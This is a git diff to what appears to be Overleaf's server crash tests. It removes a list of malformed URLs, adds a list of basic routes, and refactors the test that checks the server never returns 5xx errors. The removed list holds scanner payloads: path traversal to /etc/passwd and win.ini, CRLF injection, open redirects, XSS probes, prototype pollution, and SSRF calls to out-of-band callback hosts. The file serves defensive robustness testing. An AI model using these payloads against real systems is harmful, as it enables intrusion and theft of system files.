diff --git a/services/web/test/acceptance/files/crash_test_urls.txt b/services/web/test/acceptance/files/crash_test_urls.txt deleted file mode 100644 index 39e066d92c..0000000000 --- a/services/web/test/acceptance/files/crash_test_urls.txt +++ /dev/null @@ -1,192 +0,0 @@ -// -///%09/example.com -//%0D%0ASet-Cookie:crlfinjection=crlfinjection -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd/ -///////%20../%20../%20../%20../%20../%20../etc%2fpasswd -///////%20../%20../%20../%20../%20../%20../etc%2fpasswd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc%2fpasswd%23vt/test -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd/ -///////%20../%20../%20../%20../%20../%20../etc%5cpasswd -///////%20../%20../%20../%20../%20../%20../etc%5cpasswd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc%5cpasswd%23vt/test -///////%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd/ -///////%20../%20../%20../%20../%20../%20../etc/passwd -///////%20../%20../%20../%20../%20../%20../etc/passwd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc/passwd%23vt/test -///////%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd/ -///////%20../%20../%20../%20../%20../%20../etc\x5Cpasswd -///////%20../%20../%20../%20../%20../%20../etc\x5Cpasswd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc\x5Cpasswd%23vt/test -//%2509/example.com -///%2509/example.com -////%2509/example.com -//%250d%250ahttp://example.com/ -//.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini -//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd -//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini -//%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini -//..%255C../..%255C../..%255C../..%255C../..%255C../..%255C../etc/profile -//%255cexample.com -///%255cexample.com -////%255cexample.com -//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/profile -//..%25c0%25af../..%25c0%25af../..%25c0%25af../..%25c0%25af../..%25c0%25af../..%25c0%25af../etc/profile -//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd -//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini -//.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd -//.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini -//%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd -//%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini -//%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd -//..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5cetc/passwd -//..%5c..%5cetc/passwd -//..%5cetc/passwd -//%5cexample.com -////%5cexample.com -//?AaauA=olihQ -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini -//%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml -//%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml -//%c0%ae/%c0%ae/WEB-INF/web.xml -//%c0%ae/WEB-INF/web.xml -//.env.150 -//.env.34.213 -//////////etc%2fpasswd -//////////etc%2fpasswd/ -/////////etc%2fpasswd -/////////etc%2fpasswd/ -////////etc%2fpasswd -////////etc%2fpasswd/ -////etc%2fpasswd -////etc%2fpasswd/ -///etc%2fpasswd -///etc%2fpasswd/ -//etc%2fpasswd -//etc%2fpasswd/ -//////////etc%2fpasswd%23vt/test -/////////etc%2fpasswd%23vt/test -////////etc%2fpasswd%23vt/test -////etc%2fpasswd%23vt/test -///etc%2fpasswd%23vt/test -//etc%2fpasswd%23vt/test -//////////etc%5cpasswd -//////////etc%5cpasswd/ -/////////etc%5cpasswd -/////////etc%5cpasswd/ -////////etc%5cpasswd -////////etc%5cpasswd/ -////etc%5cpasswd -////etc%5cpasswd/ -///etc%5cpasswd -///etc%5cpasswd/ -//etc%5cpasswd -//etc%5cpasswd/ -//////////etc%5cpasswd%23vt/test -/////////etc%5cpasswd%23vt/test -////////etc%5cpasswd%23vt/test -////etc%5cpasswd%23vt/test -///etc%5cpasswd%23vt/test -//etc%5cpasswd%23vt/test -//example%2500.com -//example%25E3%2580%2582com -//https%253a//example.com// -//https%253a///example.com/%252e%252e -//https%253a//example.com/%252e%252e%252f -//https%3a//example.com/%2e%2e%2f -//https%3a//example.com/..%2f -//overleaf.example.com.443/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a.html?url=http://overleaf.example.com.443.lcccprjn.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/content/proxy.reportingservices.json/a.ico?url=http://overleaf.example.com.443.lcccpru.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs///cq///contentinsight///content///proxy.reportingservices.json?url=http://overleaf.example.com.443.lcccccc.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/cq/contentinsight/content/proxy.reportingservices.json?url=http://overleaf.example.com.443.lcccpr.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet;%0a.html?url=http://overleaf.example.com.443.lccprjnu.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.a.21.css?url=http://overleaf.example.com.443.lccprcu.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443//libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.a.21.css?url=http://overleaf.example.com.443.llccprj.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet/a.ico?url=http://overleaf.example.com.443.lccpr.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.css?url=http://overleaf.example.com.443.lccpruc.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.html?url=http://overleaf.example.com.443.lccpruh.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.ico?url=http://overleaf.example.com.443.lccpri.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs///cq///contentinsight///proxy///reportingservices.json.get.servlet?url=http://overleaf.example.com.443.lccprjg.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet?url=http://overleaf.example.com.443.lccpr.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/mcm/salesforce/customer/a.ico?checktype=authorize&authorization_url=http://overleaf.example.com.443.lmscaic.mk7.xyz&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e -//overleaf.example.com.443/libs/mcm/salesforce/customer?checktype=authorize&authorization_url=http://overleaf.example.com.443.lmscc.mk7.xyz&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e&.css -//overleaf.example.com.443/libs/mcm/salesforce/customer.html;%0aa.css?checktype=authorize&authorization_url=http://overleaf.example.com.443.lmsmn.mk7.xyz&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e -//overleaf.example.com.443/libs/opensocial/makerequest;%0a.html?container=default&url=http://overleaf.example.com.443.lomnh.mk7.xyz/os/omn -//overleaf.example.com.443/libs/opensocial/makerequest/a.ico?container=default&url=http://overleaf.example.com.443.lomai.mk7.xyz/os/aim -//overleaf.example.com.443/libs///opensocial///makerequest?container=default&url=http://overleaf.example.com.443.lomcd.mk7.xyz/&.css -//overleaf.example.com.443/libs/opensocial/makerequest?container=default&url=http://overleaf.example.com.443.lomc.mk7.xyz/&.css -//overleaf.example.com.443/plugins/servlet/issue-retriever?columns=summary&url=http://overleaf.example.com.443.psic.mk7.xyz/os/aba -//overleaf.example.com.443/rest/sharelinks/1.0/link?url=http://overleaf.example.com.443.rsol.mk7.xyz/os/ros -//ozTaSrMQ%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/administrator/index.cfm -//ozTaSrMQ%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//ozTaSrMQ%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/administrator/index.cfm -//ozTaSrMQ%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini -//?__proto__%5Bsssied%5D=sssieda&__proto__.sssied=sssiedb&constructor.prototype.sssied=sssiedc&constructor%5Bprototype%5D%5Bsssied%5D=sssiedd&x.__proto__.sssied=sssiede&x%5B__proto__%5D%5Bsssied%5D=sssiedf&x.constructor.prototype.sssied=sssiedg&x%5Bconstructor%5D%5Bprototype%5D%5Bsssied%5D=sssiedh -//proxy.stream%3Forigin=http://overleaf.example.com.443.ppsto.mk7.xyz -//qNAViNxG%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/administrator/index.cfm -//qNAViNxG%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//qNAViNxG%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/administrator/index.cfm -//qNAViNxG%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//?redirect=..%2f..%2f..%2f..%2fwindows/win.ini -//?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini -/\x5Cu001B]8;;https://interact.sh\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc/passwd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc/passwd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc/passwd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc\x5Cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc\x5Cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc\x5Cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%5cpasswd%23vt/test -//?sssieddparamNamexsx=dummy&address=sssieddaddressxsx&redirect=sssieddredirectxsx&userid=sssiedduseridxsx -//?sssieddparamNamexsx=dummy&address=sssieddaddressxsx&tags=sssieddtagsxsx&feed=sssieddfeedxsx&stage=sssieddstagexsx&level=sssieddlevelxsx&activate=sssieddactivatexsx&state=sssieddstatexsx&confirm=sssieddconfirmxsx&utm_campaign=sssieddutm_campaignxsx&visible=sssieddvisiblexsx&linkurl=sssieddlinkurlxsx&request=sssieddrequestxsx&all=sssieddallxsx&return_url=sssieddreturn_urlxsx&SAMLRequest=sssieddSAMLRequestxsx&src=sssieddsrcxsx&cmd=sssieddcmdxsx&Referer=sssieddRefererxsx&image_host=sssieddimage_hostxsx&cancel=sssieddcancelxsx&end=sssieddendxsx&group=sssieddgroupxsx&uuid=sssiedduuidxsx&short=sssieddshortxsx&version=sssieddversionxsx -//?sssieddparamNamexsx=dummy&add=sssieddaddxsx&address=sssieddaddressxsx&log=sssieddlogxsx&step=sssieddstepxsx&reset=sssieddresetxsx&checked=sssieddcheckedxsx&other=sssieddotherxsx&settings=sssieddsettingsxsx&meta=sssieddmetaxsx&message=sssieddmessagexsx&dir=sssiedddirxsx&pass=sssieddpassxsx&issues=sssieddissuesxsx&from=sssieddfromxsx&parent=sssieddparentxsx&f=sssieddfxsx&ref=sssieddrefxsx&color=sssieddcolorxsx&fetch=sssieddfetchxsx&users=sssieddusersxsx&content=sssieddcontentxsx&generate=sssieddgeneratexsx&admin=sssieddadminxsx&msg=sssieddmsgxsx&URL=sssieddURLxsx diff --git a/services/web/test/acceptance/files/crash_test_urls/basic.txt b/services/web/test/acceptance/files/crash_test_urls/basic.txt new file mode 100644 index 0000000000..556474cf89 --- /dev/null +++ b/services/web/test/acceptance/files/crash_test_urls/basic.txt @@ -0,0 +1,22 @@ +/ +// +/user/contacts +/user/password/reset +/user/password/set +/home +/user/subscription +/subscription/invites/ +/login +/restricted +/register +/user/bonus +/system/messages +/user/settings +/user/projects +/project +/api/project +/project/download/zip +/tag +/notifications +/beta/participate +/unsupported-browser diff --git a/services/web/test/acceptance/src/ServerCrashTests.js b/services/web/test/acceptance/src/ServerCrashTests.js index 7185e1a803..1587e2d8aa 100644 --- a/services/web/test/acceptance/src/ServerCrashTests.js +++ b/services/web/test/acceptance/src/ServerCrashTests.js @@ -4,24 +4,28 @@ const Path = require('path') const fetch = require('node-fetch') const UserHelper = require('./helpers/UserHelper') const BASE_URL = UserHelper.baseUrl() +const glob = require('glob') -const CRASH_TEST_URLS = fs - .readFileSync(Path.join(__dirname, '../files/crash_test_urls.txt')) - .toString() - .split('\n') +// Test all files in the crash_test_urls directory +const CRASH_TEST_FILES = glob.sync( + Path.join(__dirname, '../files/crash_test_urls/*.txt') +) describe('Server Crash Tests', function () { - it(`should not crash on bad urls`, async function () { - // increase the timeout for this test due to the number of urls - this.timeout(60 * 1000) - // test each url in the list - for (let i = 0; i < CRASH_TEST_URLS.length; i++) { - const url = BASE_URL + CRASH_TEST_URLS[i] - const response = await fetch(url) - expect(response.status).to.not.match( - /5\d\d/, - `Request to ${url} failed with status ${response.status}` - ) - } - }) + for (const file of CRASH_TEST_FILES) { + const crashTestUrls = fs.readFileSync(file).toString().split('\n') + it(`should not crash on bad urls in ${file}`, async function () { + // increase the timeout for these tests due to the number of urls + this.timeout(60 * 1000) + // test each url in the list + for (let i = 0; i < crashTestUrls.length; i++) { + const url = BASE_URL + crashTestUrls[i] + const response = await fetch(url) + expect(response.status).to.not.match( + /5\d\d/, + `Request to ${url} failed with status ${response.status}` + ) + } + }) + } })